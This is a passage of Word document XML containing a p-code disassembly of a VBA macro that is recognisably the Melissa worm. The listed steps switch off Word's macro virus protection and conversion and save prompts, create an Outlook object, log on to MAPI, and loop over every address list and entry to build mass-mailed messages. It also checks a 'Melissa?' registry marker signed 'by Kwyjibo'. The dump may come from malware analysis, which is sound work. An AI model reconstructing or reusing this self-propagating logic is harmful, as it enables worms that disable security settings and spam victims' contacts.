        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A3146" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390FF1B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt ConfirmConversions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C977CE2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9ECE49" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C7460" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE96702" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77219349" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C565F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A6849" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt VirusProtection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF6FF7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA74074" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146095C2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585DF171" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27045E35" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EEF24" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05493AC2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt SaveNormalPrompt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FCF8F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA8BCC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1EBB2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BFCA8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65988F92" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn UngaDasOutlook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8CC60" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn DasMapiName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A554DC6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn BreakUmOffASlice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75958908" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6EB86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787631A4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0013 "Outlook.Application"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B6918" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CreateObject 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DBBC1F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CCDB82" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DF9F2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A8C2A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0004 "MAPI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FD32A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF4DD08" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd GetNameSpace 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD04F87" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587BCCA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23628DEA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB1F81" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55245501" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Melissa?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDE998" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75574B13" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8169B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000E "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B81824" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B830321" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1BF1F6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E56A4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE9730" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Outlook"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292ADC76" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C587467" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187695F2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #14:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18632894" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "profile"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F186A11" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9DFC6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA815A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Logon 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E412C0B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45436D60" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7CB60" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1F0FF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06175FA6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD2444" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825310C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressLists </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D78C39" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B5213" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8AE46" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #16:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18426137" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45982DC8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A213156" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666EAEB8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd AddressLists 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31BA10" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBBCE5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #17:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A892A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287CE05C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7E391" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #18:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA209B7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B9BBB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A721E4A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700D00E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd CreateItem 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A7465" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FE8DC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #19:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5132A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D2AE5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76035799" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79448290" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451C36D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC302D7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressEntries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750CE91" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211700F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204D20F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #20:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB3E6D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A969F2F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65B8C5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd AddressEntries 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E5094" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St Peep </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F163713" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BB0BE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Peep </w:t>
      </w:r>
    </w:p>
